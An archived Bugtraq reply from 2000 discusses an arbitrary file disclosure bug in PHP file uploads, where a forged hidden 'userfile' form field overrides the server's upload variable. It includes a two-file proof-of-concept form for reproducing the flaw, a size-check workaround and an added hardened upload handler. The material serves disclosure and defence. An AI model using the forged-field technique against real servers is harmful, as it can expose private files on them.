Bugtraq mailing list archives

Re: (SRADV00001) Arbitrary file disclosure through PHP file upload


From: Signal 11 <signal11 () MEDIAONE NET>
Date: Mon, 4 Sep 2000 01:39:14 -0500

I have forwarded the original message to php-dev () lists php net,
as there was no indication the developers were copied on the
bugtraq post.

This issue is Bug ID #6496 in the PHP bug database.
Additional information is here: http://bugs.php.net/bugs.php?id=6496,
and was entered 09/01/2000.

However, the problem was discovered as early as May 15 by hgerlach () gmx de
Original post: http://www.php.net/manual/features.file-upload.php
(about 2/3rds of the way down in the user comments)

Also, my copy of PHP has track_vars enabled per default (as per the
php4 that ships with Mandrake 7), which was one of the recommendations
you made in your original post.

Here's how you can reproduce this on your own. Create the following
file as "test.php" on the http server running php:

<!-- test.php ##################################################### -->
<html>
<body>
<form action="<?php echo $PHP_SELF ?>" method="POST"
        ENCTYPE="multipart/form-data">
    <input type="file" name="userfile">
    <input type="submit">
</form>
<pre>
<?php
   echo("userfile      = $userfile      \n");
   echo("userfile_name = $userfile_name \n");
   echo("userfile_type = $userfile_type \n");
   echo("userfile_size = $userfile_size \n");
?>
</pre>
</body>
</html>
<!-- CUT HERE #################################################### -->

Now, create a file on your LOCAL computer called test.html with
the following contents:

<!-- test.html ##################################################### -->
<html>
<body>
<form action="http://YOUR_SERVER_HERE/blah/blah/test.php"
        ENCTYPE="multipart/form-data" method="POST">
    <input type="file" name="userfile">
    <input type="hidden" name="userfile" value="hackme">
    <input type="submit">
</form>
</body>
</html>
<!-- CUT HERE #################################################### -->

Go to http://YOUR_SERVER_HERE/blah/blah/test.php, run the script, and
upload any file. Note the output. Now open test.html on your LOCAL
computer and repeat the same steps you did when you were on the
server. Hit submit. Note the change in output.

Now, before you go off the deep end, there is a simple one-line
workaround...

<?php
        // $userfile and $userfile_size are register_globals variables and
        // can both be forged by the client; a forged path whose real size
        // on the server does not match the claimed size is caught here.
        if($userfile_size != filesize($userfile)){
                echo "File upload variables have been tampered with.\n";
        }
?>

This will prevent most attacks, unless the filesize is the same
as the local file. Like I said - a workaround, but it is one you
can implement in your code *now* instead of waiting for a patch.

I'm hoping the PHP guys will update the bug 6496 with either
a fix or an assignment soon...


--
Signal 11 -o- BOFH, boredengineers.com
Q: What's the difference between your project and putting wings
on an elephant?  A: The elephant *might* fly.
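For readers on a later PHP: the hardened form of the test.php handler, as an added example that is not part of the original post or of PHP's own documentation. It relies on is_uploaded_file()/move_uploaded_file() (added in PHP 4.0.3), the $_FILES array (PHP 4.1.0) and random_bytes() (PHP 7); the upload directory /var/uploads and the helper name accept_upload are assumptions.

```php
<?php
// Added example, not from the original post. Assumes PHP 7+.
// With register_globals off (the default since PHP 4.2.0) a hidden
// "userfile" form field can no longer overwrite the server-side upload
// variables, and is_uploaded_file() rejects any path the SAPI upload
// handler did not itself create, which closes the disclosure above.

// Hypothetical destination directory, kept outside the web root.
define('UPLOAD_DIR', '/var/uploads');

/**
 * Validate one $_FILES entry and move it to UPLOAD_DIR.
 * Returns the stored path on success, or null when the entry is not a
 * genuine upload (forged tmp_name, failed transfer, oversize, etc.).
 */
function accept_upload(array $f, string $dir): ?string
{
    if (!isset($f['tmp_name'], $f['error'], $f['size'])
        || $f['error'] !== UPLOAD_ERR_OK) {
        return null;            // transport-level failure, nothing to trust
    }
    // The core check: tmp_name must be a file PHP created for this
    // request. A client-supplied string such as "/etc/passwd" fails here.
    if (!is_uploaded_file($f['tmp_name'])) {
        return null;
    }
    // Never reuse the client's file name; pick an opaque server-side one.
    $dest = $dir . '/' . bin2hex(random_bytes(16));
    // move_uploaded_file() repeats the is_uploaded_file() check itself.
    if (!move_uploaded_file($f['tmp_name'], $dest)) {
        return null;
    }
    return $dest;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['userfile'])) {
    $stored = accept_upload($_FILES['userfile'], UPLOAD_DIR);
    echo $stored === null
        ? "Upload rejected: not a genuine uploaded file.\n"
        : "Stored as " . basename($stored) . "\n";
}
?>
```

Replaying the hidden-field trick from test.html against this handler yields "Upload rejected", because the forged value never passes is_uploaded_file().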
